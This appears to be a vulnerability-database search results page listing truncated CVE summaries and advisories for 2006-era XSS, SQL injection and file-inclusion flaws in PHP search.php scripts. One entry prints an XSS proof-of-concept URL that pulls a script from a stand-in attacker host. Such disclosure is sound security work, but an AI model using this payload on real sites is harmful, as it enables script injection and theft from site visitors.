1673 matches found
Cross site scripting
Cross-site scripting (XSS) vulnerability in search.php in QontentOne CMS allows remote attackers to inject arbitrary web script or HTML via the searchphrase parameter...
CVE-2006-2726
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in (1) drucken.php, (2) drucken2.php, (3) emailanbenutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php...
Remote file inclusion
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in (1) drucken.php, (2) drucken2.php, (3) emailanbenutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php...
SQL injection
SQL injection vulnerability in search.php in Open Searchable Image Catalogue (OSIC) 0.7.0.1 and earlier allows remote attackers to inject arbitrary SQL commands via the (1) txtCustomField and (2) CustomFieldID array parameters...
CVE-2006-2751
The CVE-2006-2751 entry describes a cross-site scripting (XSS) vulnerability in Open Searchable Image Catalogue (OSIC) versions 0.7.0.1 and earlier. The affected component is the search.php handler where the item_list parameter is used in a way that allows remote attackers to inject arbitra...
CVE-2006-2749
SQL injection vulnerability in search.php in Open Searchable Image Catalogue (OSIC) 0.7.0.1 and earlier allows remote attackers to inject arbitrary SQL commands via the (1) txtCustomField and (2) CustomFieldID array parameters...
CVE-2006-2749
CVE-2006-2749 is a SQL injection vulnerability in Open Searchable Image Catalogue (OSIC) 0.7.0.1 and earlier, specifically in search.php. The underlying flaw allows remote attackers to inject arbitrary SQL via the (1) txtCustomField and (2) CustomFieldID array parameters. Affected prod...
QontentOneCMS v1.0
QontentOneCMS v1.0 homepage: http://www.qontentone.com/ Affected files: search.php input forms XSS Proof of concept: http://www.example.com/search.php?searchphrase="SCRIPT SRC=http://www.evilsite.com/xss.js/SCRIPT"&search=Search...
CVE-2006-2650
The CVE-2006-2650 entry documents an SQL injection in CosmicShoppingCart, specifically in cosmicshop/search.php, exploitable via the max parameter. The vulnerability allows remote attackers to craft arbitrary SQL commands executed by the database. The affected component is the search functionalit...
CosmicShoppingCart - 'search.php' SQL Injection
Software: CosmicShoppingCart www.cosmicphp.com Risk: Medium Discovered by: Vympel Marcelo Almeida Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. SQL injections have been found, they could be exploited by users to retrieve the...
CosmicShoppingCart - search.php SQL Injection
CosmicShoppingCart - search.php SQL Injection Software: CosmicShoppingCart www.cosmicphp.com Risk: Medium Discovered by: Vympel Marcelo Almeida Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. SQL injections have been found, th...
ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net
Author: SuperHeiAtph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Date: 2006-04-27 Simple analysis The vulnerability is another one of pregreplace+/e vulnerability; the code is in \sources\actionadmin\search.php line 1 2 5 8-1 2 6 a 2: if $this-ipsclass-input'lastdate' $this-outp...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO and (2) the category parameter...
CVE-2006-2506
Multiple cross-site scripting (XSS) vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO and (2) the category parameter...
CVE-2006-2506
CVE-2006-2506 affects Sphider’s search.php, enabling multiple XSS via PATH_INFO and the category parameter. The available connected documents confirm the vulnerable component and vectors but do not provide specific version numbers, exploit details, or remediation within the supplied material. The...
SaPHPLession30.txt
SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --: 1- Unfilter array Filename :- show.php Line :- 102 code $hrow = $Row2;/code Fix :- Add To Line 11 /show.php This Code :- we add the code to global to fix all unfilter ver. at the code : code $hrow = array;/code Exploit :- GET ^...
neo-Advisory-20.txt
Neo Security Team NST® Advisory 20 Program : CuteNews 1.4.1 Homepage: http://www.cutephp.com Vulnerable Versions: CuteNews 1.4.1 & lower ones Risk: Medium! Impact: Cro...
SQL injection
SQL injection vulnerability in search.php in Servous sBLOG 0.7.2 allows remote attackers to execute arbitrary SQL commands via the keyword parameter. NOTE: this issue can be used to trigger path disclosure. In addition, it might be primary to vector 1 in CVE-2006-1135...
Cross site scripting
Cross-site scripting (XSS) vulnerability in search.php in PHPKB Knowledge Base allows remote attackers to inject arbitrary web script or HTML via the searchkeyword parameter. NOTE: the issue was originally disputed by the vendor, but on 20060519, the vendor notified CVE that "We have fixed all the...
CVE-2006-2184
Cross-site scripting (XSS) vulnerability in search.php in PHPKB Knowledge Base allows remote attackers to inject arbitrary web script or HTML via the searchkeyword parameter. NOTE: the issue was originally disputed by the vendor, but on 20060519, the vendor notified CVE that "We have fixed all the...